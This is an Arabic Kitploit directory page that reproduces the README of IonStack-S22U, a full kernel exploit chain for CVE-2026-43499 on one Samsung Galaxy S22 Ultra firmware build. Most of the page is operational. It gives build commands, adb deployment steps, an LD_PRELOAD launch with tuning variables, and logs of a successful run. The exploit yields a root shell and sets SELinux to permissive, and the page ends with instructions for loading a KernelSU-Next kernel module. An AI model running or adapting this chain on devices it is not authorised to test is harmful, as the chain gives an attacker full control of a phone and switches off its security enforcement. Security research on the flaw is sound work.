Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
IonStack-S22U — CVE-2026-43499 سلسلة استغلال كاملة لهاتف Samsung Galaxy S22 Ultra (نواة Android 5.10) | Kitploit
أدوات/GitHubGitHub/sarabpal-dev/ionstack-s22u
أمان أندرويدتصعيد الامتيازاتالاستغلالما بعد الاستغلالأمن الجوالاستغلال الملفات الثنائية
GitHubsarabpal-dev/ionstack-s22u

IonStack-S22U

CVE-2026-43499 سلسلة استغلال كاملة لهاتف Samsung Galaxy S22 Ultra (نواة Android 5.10)

عرض المستودع
417منذ 19س 25دتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-43499 - Galaxy S22 Ultra

https://github.com/user-attachments/assets/f3d0858d-f8f5-444f-8ae5-541c2bc744c3

يحتوي هذا المستودع على نسخة معدّلة خاصة بجهاز معيّن من استغلال CVE-2026-43499 لهاتف Samsung Galaxy S22 Ultra (SM-S908W).

الهدف المدعوم

root@kitploit:~
Device: Samsung Galaxy S22 Ultra (SM-S908W)
Codename: b0q
Android: 15 / SDK 35
Build number: AP3A.240905.015.A2.S908WVLS8FYG7
Build display ID: AP3A.240905.015.A2.S908WVLS8FYG7
Build fingerprint: samsung/b0qcsx/b0q:15/AP3A.240905.015.A2/S908WVLS8FYG7:user/release-keys
Kernel: 5.10.226-android12-9-30958166-abS908WVLS8FYG7
Architecture: aarch64

الإنزياحات (Offsets) وتخطيطات البنى في هذا المستودع خاصة بالبرنامج الثابت أعلاه. لا تدعم ملفات تعريف الأهداف هذه الطرازات الأخرى أو إصدارات البرامج الثابتة الأخرى.

المصدر المرجعي

يعتمد هذا المنفذ على تنفيذ الاستغلال المنشور في:

  • NebuSec/CyberMeowfia — IonStack/CVE-2026-43499/exploit
  • BuSung-dev/CVE-2026-43499-S25U
  • المراجعة الأصلية (Upstream) المستخدمة كقاعدة للنقل: b850d3bddc74c3328d5fbcc0568d21962b55d949

شكر خاص إلى:

  • F-19-F/IonStackQuest3

يُحتفظ برخصة Apache License 2.0 الأصلية في LICENSE.

التغييرات الرئيسية في النقل

  • تم نقل الاستغلال من نواة v6.6 (Galaxy S25 Ultra) إلى نواة أندرويد v5.10 (Galaxy S22 Ultra / b0q).
  • أُضيفت إنزياحات هدف b0q / S908WVLS8FYG7 (src/targets/S908WVLS8FYG7/target.h) وتخطيطات بنى النواة.
  • استُبدل سباق pselect بمسار exp32: تنسيق futex، وختم مكدس 32-بت، وتشغيل sched_setattr في مرحلة فرعية مضمّنة 32-بت (src/exp32/).
  • أُضيف استرداد تلقائي لانزلاق KASLR عبر tracefs لنواة سامسونج.
  • نُقل تخطيط PI waiter/task الوهمي، ومرحلة CFI/FOPS، وبدائية القراءة/الكتابة الفيزيائية إلى v5.10.
  • أُضيف مسار جذر user-mode-helper عبر system_unbound_wq آمن ضد KDP، وتحديث هدف فرض SELinux وقت التشغيل إلى selinux_state.enforcing.
  • أُضيف مساعد أوامر جذر مدعوم بمقبس (socket) في /data/local/tmp/cve-2026-43499-root.
  • تتم استعادة مؤشر FOPS العام لـ ashmem فور إنشاء بدائية القراءة/الكتابة العشوائية.
  • يُحتفظ بالصفحات المستردَّة في عملية منفصلة cve43499-hold بعد النجاح، بحيث لا يمكن إعادة تدوير المراجع العالقة في النواة إلى كائنات slab غير ذات صلة.
  • تُشغَّل محاولات السباق الفاشلة في عمليات فرعية مستقلة، مع إعادة محاولة تلقائية بتسلسل تأخير مضبوط للجهاز.

البناء

اضبط ANDROID_NDK_HOME على Android NDK r27+ أو سلسلة أدوات متوافقة، ثم نفّذ:

root@kitploit:~
make PROJECT=S908WVLS8FYG7 clean preload root-helper

للبناء لبيئة QEMU تشغّل نواة أندرويد مع نظام ملفات Buildroot:

  • إصدار Buildroot Toolchain: نزّل سلسلة الأدوات من sarabpal-dev/qemu Release (samsung-v1)
  • دليل تشغيل نواة QEMU: دليل الإعداد والتشغيل في QEMU Samsung README
root@kitploit:~
make USE_BUILDROOT=1 PROJECT=S908WVLS8FYG7 clean preload root-helper

المخرجات:

root@kitploit:~
build/S908WVLS8FYG7/bin/cve-2026-43499
build/S908WVLS8FYG7/bin/cve-2026-43499-root
build/S908WVLS8FYG7/bin/cve-exp32

النشر

root@kitploit:~
adb push build/S908WVLS8FYG7/bin/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/S908WVLS8FYG7/bin/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb push build/S908WVLS8FYG7/bin/cve-exp32 /data/local/tmp/cve-exp32
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root /data/local/tmp/cve-exp32

التشغيل

نفّذ مرحلة الاستغلال لبدء خفيّ الجذر (root daemon):

root@kitploit:~
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 sh"

بعد النجاح، افتح شلّ جذر تفاعلي من أي مكان على الجهاز:

root@kitploit:~
adb shell "/data/local/tmp/cve-2026-43499-root"

أو نفّذ أوامر الجذر مباشرة:

root@kitploit:~
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"

يقوم التشغيل الافتراضي بما يصل إلى 16 محاولة مستقلة. يخرج كل طفل (child process) فاشل قبل المحاولة التالية، بحيث يتم تحرير مؤشرات الملفات وتخصيصات تشكيل الكومة (heap-shaping) الخاصة به بدلاً من تراكمها داخل عملية استغلال واحدة طويلة الأمد.

التأخير الأساسي الافتراضي هو 20000 ميكروثانية، ويقوم المشرف (supervisor) بمسح التسلسل التالي مرتين:

root@kitploit:~
20000, 30000, 50000, 25000, 40000, 15000, 60000, 35000

يمكنك تجاوز عدد المحاولات أو التأخير الأساسي عند جمع بيانات التوقيت:

root@kitploit:~
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 sh"

نتيجة موثّقة على S908WVLS8FYG7:

root@kitploit:~
[*] root umh result wake=1 complete=1 retval=0 socket=1
[+] pipe-physrw-summary pid=5011 done=1 root=1 kaslr=1 base=ffffffc0080d8000 slide=00000000000d8000
[+] pipe physrw pid=5011 done=1 root=1 kaslr=1 read_ok=1 write_ok=1 rw64=1/1 uid=2000->0
[+] stability keeper pid=28206 retaining reclaimed kernel pages
[+] exploit completed attempt=1/16

جلسة شلّ جذر تفاعلية:

root@kitploit:~
b0q:/data/local/tmp $ ./cve-2026-43499-root                              
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
:/ # getenforce
Permissive

المرحلة الأولية تعتمد على السباق (race). تتم إعادة محاولة أي عملية طفل تخرج بـ root=0 تلقائيًا. عند التنفيذ الناجح، تتم استعادة ashmem_misc.fops، وتحويل SELinux إلى وضع permissive، وتشغيل خفيّ مساعد الجذر حتى إعادة التشغيل التالية.

جذر دائم باستخدام KernelSU-Next

الاستغلال أعلاه يمنح الجذر للإقلاع الحالي فقط. للحصول على تطبيق Manager وتحكّم بنمط su لبقية الجلسة، حمّل KernelSU-Next كوحدة نواة تُحمَّل متأخرًا (late-load) عبر مساعد الجذر.

  1. نزّل ملفَي الإصدار من v3.3.0-android12-5.10:

    • KernelSU_Next_v3.3.0-release.apk — تطبيق Manager
    • kernelsu-android12-5.10.ko — وحدة نواة LKM
  2. ثبّت ملف APK الخاص بـ Manager:

root@kitploit:~
adb install KernelSU_Next_v3.3.0-release.apk
  1. ادفع الوحدة وحمّلها عبر مساعد الجذر الذي حصلت عليه أعلاه:
root@kitploit:~
adb push kernelsu-android12-5.10.ko /data/local/tmp/kernelsu-android12-5.10.ko
adb shell "/data/local/tmp/cve-2026-43499-root -c 'insmod /data/local/tmp/kernelsu-android12-5.10.ko'"
  1. افتح تطبيق KernelSU Next على الجهاز — يجب أن يكتشف الوحدة المحمّلة ويعرض إدارة المستخدم الفائق (superuser)، ودعم الوحدات/Zygisk، وksud soft-reboot.

بما أن هذه وحدة LKM تُحمَّل متأخرًا (وليست صورة إقلاع معدّلة)، فهي لا تبقى بعد إعادة التشغيل — ستحتاج إلى إعادة تشغيل الاستغلال وإعادة insmod للوحدة في كل مرة يُعاد فيها تشغيل الجهاز.

[!WARNING] ملاحظة الموثوقية وانهيار النواة (Kernel Panic): مرحلة السباق حسّاسة للتوقيت وغير موثوقة حاليًا — قد تفشل أو تسبب انهيارًا للنواة في معظم المحاولات. كن صبورًا، فالإقلاعات النظيفة توفّر معدل نجاح أعلى. قد تُطرح تحسينات مستقبلية لزيادة الموثوقية.

[!TIP] توصيات الاستقرار ومعدل النجاح:

  • إعادة تشغيل الجهاز: للحصول على أعلى معدل نجاح، أعد تشغيل الجهاز قبل تشغيل الاستغلال لضمان حالة نظيفة للـ slab/الكومة.
  • إغلاق التطبيقات في الخلفية: تأكد من إغلاق جميع التطبيقات التي تعمل في الخلفية.
  • فتح الشاشة والبقاء بدون استخدام: أبقِ الجهاز مفتوحًا ولا تتفاعل مع الهاتف أو تستخدمه أثناء تشغيل الاستغلال، لأن إدخالات المستخدم النشطة أو المهام في الخلفية قد تخلّ بالتوقيت وربما تؤدي إلى انهيار النواة.

استخدم فقط على الأجهزة التي تملكها أو المخوَّل لك اختبارها صراحةً.

تنزيل الأداة